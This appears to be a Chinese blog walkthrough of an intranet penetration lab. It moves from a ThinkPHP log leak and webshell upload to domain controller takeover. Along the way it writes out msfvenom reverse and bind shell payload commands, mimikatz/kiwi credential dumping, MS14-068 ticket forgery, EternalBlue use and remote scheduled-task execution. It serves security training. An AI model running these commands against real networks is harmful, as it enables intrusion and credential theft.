【网络安全】内网渗透之一次简单内网靶场渗透

于 2024-07-15 10:41:09 发布
阅读量784 收藏 23
点赞数 15
文章标签: web安全 安全 网络 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anquan2233/article/details/140432109
版权

image.png

本次内网网络拓扑图如下所示,首先将WEB的IP 192.168.0.150改为192.168.0.3

image.png

(一)测试过程

信息收集:

1. 对目标IP进行端口扫描。

sudo nmap -sS --open -Pn -p- -v 192.168.0.3

image.png

2.绑定hosts 192.168.0.3 www.webhack123.com,访问网站首页出现一个thinkphp框架。
image.png

3.对网站进行目录扫描。
image.png

4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。
image.png

【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

(二)检测过程

  1. 通过前面的信息搜集,已经知道当前网站是thinkphp框架了,使用工具扫描一下常见的漏洞,发现存在日志泄漏。
    image.png

2.在日志中泄漏了账号和密码的密文。

账号:admin
密文:74c774ef39b5b977c1fd59dbfc73c3e380a65aa3

image.png

3.通过解密获取密码明文web123。

image.png

4.前面对网站进行目录扫描,未发现网站管理后台,因此使用脚本来绑定 hosts 碰撞管理后台的子域名。

image.png

5. admin.webhack123.com就是网站的管理后台。

image.png

6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。

image.png

7.进入网站后台,修改允许上传的类型,上传一句话木马。

image.png

8.使用蚁剑连接获取webshell。

image.png

  1. 在当前主机先进行简单的信息搜集,当前用户为administrator且主机未安装杀软,存在双网卡192.168.0.0/24 10.10.10.0/24,存在域环境。

生成攻击载荷先上线msf:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999 -f exe>haha.exe

image.png

10.迁移进程获取明文密码。

migrate 600

load kiwi

creds_all

image.png

11.获取登录过当前主机的用户信息。

run post/windows/gather/enum_logged_on_users
image.png

  1. 可以看到存在hackbox域的域用户web,本地管理员Administrator的密码为:!@#Qwe456

前面我们已经知道存在域环境,现在定位到域控为:dc.hackbox.com 10.10.10.149。
image.png

(三)域渗透过程

  1. 前面知道该主机存在两个网卡,现在来对这两个网段的存活主机进行扫描,首先添加:
run autoroute -s 10.10.10.0/24
run autoroute -p

image.png

  1. 对内网存活主机进行扫描,只存在10.10.10.149,也就是域控,且开放了445端口。
    image.png

3.使用永恒之蓝试打,检测出存在永恒之蓝漏洞。
image.png

4. 反向shell失败原因未明,正向的shell是可以成功返回一个meterpreter,成功获取域控dc权限。
image.png
5. 测试使用MS14-068漏洞:使用这个 exp 需要一个普通域控用户, web 是域用户,但不知道密码。前面获取到用户Administrator的密码为!@#Qwe456,现尝试使用用户web和这个密码进行登录。
image.png

6.登录失败,但是密码应该是正确的,只是不是远程组。
image.png
7. #创建票据

ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456

Load kiwi

#清理票据

kerberos_ticket_purge

image.png

8.上传 mimikatz 注入票据 mimikatz # kerberos::ptc

TGT_web@hackbox.com.ccache。

image.png

9.查看票据 klist。
image.png

10.成功访问dc域控。
image.png

11.现在来获取域控权限,生成一个正向的载荷:

msfvenom -p windows/meterpreter/bind_tcp  LPORT=9998  -f exe>bind.exe

copy命令复制到域控copy bind.exe \dc\c$。
image.png

12. at命令执行计划任务运行bind.exe

net time [\\dc](https://www.freebuf.com/articles/network/%5C%5Cdc)

at \\dc 1:29:00 c:/bind.ex

image.png

13.成功获取域控权限。
image.png
14.迁移进程抓取明文密码。
image.png
15.至此已经拿下了域控的权限。
image.png
16.迁移到域管理员进程查看三个flag。
image.png

(四)总结

通过此次内网靶场测试,能加深对内网系统的认识,熟练掌握如何使用MSF完成整个打靶过程。

安全系统学习
关注
  • 15
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署...
网络靶场实战-记一次大型内网渗透实践 【一】
蛇矛实验室
12-13 616
本场景基于某业务架构进行搭建,场景内包含了100余台主机以及20余子网,内置相关应用,包括Web服务、邮件服务、文件服务、OA服务等,本场景多通过水坑攻击、钓鱼攻击、服务爆破等相关技术,其中包含了Chrome漏洞利用、Office漏洞利用等。通过本场景可以进行相关攻防技术训练。
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
最新发布
2401_84297265的博客
05-03 1398
内网靶场渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
红队内网靶场
qq_18811919的博客
04-14 2711
下面几个跨域靶场会陆续加上vCenter/Kubernetes/gitlab/ADCS/exchange/等常见系统,也会陆续做安全运营相关靶场从防守方视角反推红队攻击路径逆向分析木马IoC排查终端木马编写相关报告,如果大家对靶场系列感兴趣的话欢迎关注。
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 6376
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 5368
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
内网渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6098
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
作者计划分享更多关于Web渗透内网渗透靶场搭建、CVE复现等高级网络安全主题,帮助读者深入学习网络安全系统安全知识。 总的来说,这篇万字详解提供了丰富的实践指导,旨在让读者在理解网络安全理论的同时,...
国光师傅的SSRF靶场docker环境.zip
01-16
在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署...
渗透测试基础教程_ppt.rar
07-12
在这一章,我们将探讨渗透测试的概念,了解其在网络安全中的重要性。渗透测试是模拟黑客攻击行为,以检测系统防御能力的过程。我们还会介绍渗透测试的道德规范和法律界限,确保测试活动合法且合规。 第2章:基础...
2023第七届一带一路暨金砖大赛之企业信息系统安全赛项样题
05-31
该赛项旨在评估企业信息系统安全的能力,涵盖了CTF夺旗、企业内网渗透靶场行动等方面。 1. 企业信息系统安全赛项项目包括以下部分: * 参加比赛的形式:双人团队参与,总计7小时。 * 项目:包括三个阶段,分别是...
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索.pdf
12-02
本课程主要涉及的是Web渗透测试中的论坛漏洞分析和利用,特别是针对bwapp这一靶场的应用。首先,我们需要了解渗透测试的基本流程和工具使用。渗透测试是一种模拟黑客攻击,以检测系统安全性的过程。在这个过程中,...
蚁景网安渗透测试学习路径图最新.pdf
06-22
本文档提供了一个详细的学习路径图,涵盖了从基本的 Linux 操作系统到高级的渗透测试和免杀技术。以下是对该文档中涉及的知识点的详细解释: Linux 基础 * 安装 VMware 虚拟机 * 安装 CentOS 7 虚拟机 * VMware ...
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3716
红队靶场内网渗透(从DMZ主机渗透到域内机器)
一次内网靶场渗透测试
m0_60571990的博客
10-13 1220
一次内网靶场渗透测试
VulnStrack01 内网渗透靶场
嘟的博客
07-07 471
环境配置 靶场信息:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网路配置: 因为我的直接使用物理机作为攻击机所有外网网卡设置为nat模式。 外网网段vmnet1:192.168.72.0 内网网段vmnet2:192.168.52.0 windows7(web服务) 模拟外网ip:192.168.72.128 内网ip:192.168.52.143 域内主机 Win2K3 Metasploitable 内网ip:192.168.52.141 域控
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值